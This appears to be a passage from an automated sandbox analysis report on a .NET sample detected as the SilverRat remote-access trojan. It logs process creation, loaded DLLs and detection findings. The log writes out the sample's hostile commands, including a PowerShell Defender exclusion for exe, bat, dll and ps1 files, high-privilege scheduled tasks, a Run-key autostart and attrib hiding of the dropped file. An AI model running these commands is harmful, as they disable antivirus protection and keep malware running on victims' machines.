                  Source: C:\Users\user\Desktop\RLesaPFXew.exeFile created: C:\Users\user\AppData\Local\Temp\tmp4B52.tmpJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp4B52.tmp.bat""
                  Source: RLesaPFXew.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: RLesaPFXew.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: RLesaPFXew.exeReversingLabs: Detection: 65%
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeFile read: C:\Users\user\Desktop\RLesaPFXew.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\RLesaPFXew.exe "C:\Users\user\Desktop\RLesaPFXew.exe"
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\java"
                  Source: C:\Windows\System32\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\java\$77java.exe"
                  Source: C:\Windows\System32\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp4B52.tmp.bat""
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\java\$77java.exe "C:\Users\user\java\$77java.exe"
                  Source: C:\Users\user\java\$77java.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN $77java.exe
                  Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\java\$77java.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /Create /SC ONCE /TN "$77java.exe" /TR "C:\Users\user\java\$77java.exe \"\$77java.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST
                  Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\java\$77java.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN $77java.exe
                  Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\java\$77java.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\java\$77java.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /sc daily /tn "java_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00
                  Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\java\$77java.exe C:\Users\user\java\$77java.exe "\$77java.exe" /AsAdmin
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\java"Jump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\java\$77java.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp4B52.tmp.bat""Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\java\$77java.exe "C:\Users\user\java\$77java.exe" Jump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN $77java.exeJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /Create /SC ONCE /TN "$77java.exe" /TR "C:\Users\user\java\$77java.exe \"\$77java.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHESTJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN $77java.exeJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exitJump to behavior
                  Source: C:\Users\user\java\$77java.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /sc daily /tn "java_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00Jump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
                  Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
                  Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
                  Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\java\$77java.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: RLesaPFXew.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: RLesaPFXew.exeStatic PE information: Image base 0x140000000 > 0x60000000
                  Source: RLesaPFXew.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Data Obfuscation

                  barindex
                  .NET source code contains potential unpacker
                  Source: RLesaPFXew.exe, MessageRead.cs.Net Code: RecoveryData System.Reflection.Assembly.Load(byte[])
                  Source: $77java.exe.0.dr, MessageRead.cs.Net Code: RecoveryData System.Reflection.Assembly.Load(byte[])

                  Persistence and Installation Behavior

                  barindex
                  Uses cmd line tools excessively to alter registry or file data
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess created: attrib.exe
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess created: attrib.exe
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess created: attrib.exeJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess created: attrib.exeJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeFile created: C:\Users\user\java\$77java.exeJump to dropped file

                  Boot Survival

                  barindex
                  Yara detected SilverRat
                  Source: Yara matchFile source: RLesaPFXew.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.RLesaPFXew.exe.1d0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RLesaPFXew.exe.3af8618.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RLesaPFXew.exe.3af8618.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.2129565272.00000000001D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2158375099.0000000003AE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RLesaPFXew.exe PID: 5576, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\java\$77java.exe, type: DROPPED
                  Creates autostart registry keys to launch java
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NULL "C:\Users\user\java\$77java.exe"Jump to behavior
                  Uses schtasks.exe or at.exe to add and modify task schedules
                  Source: C:\Users\user\java\$77java.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN $77java.exe
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NULLJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NULLJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Loading BitLocker PowerShell Module
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Users\user\java\$77java.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                  Source: C:\Users\user\java\$77java.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RLesaPFXew.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
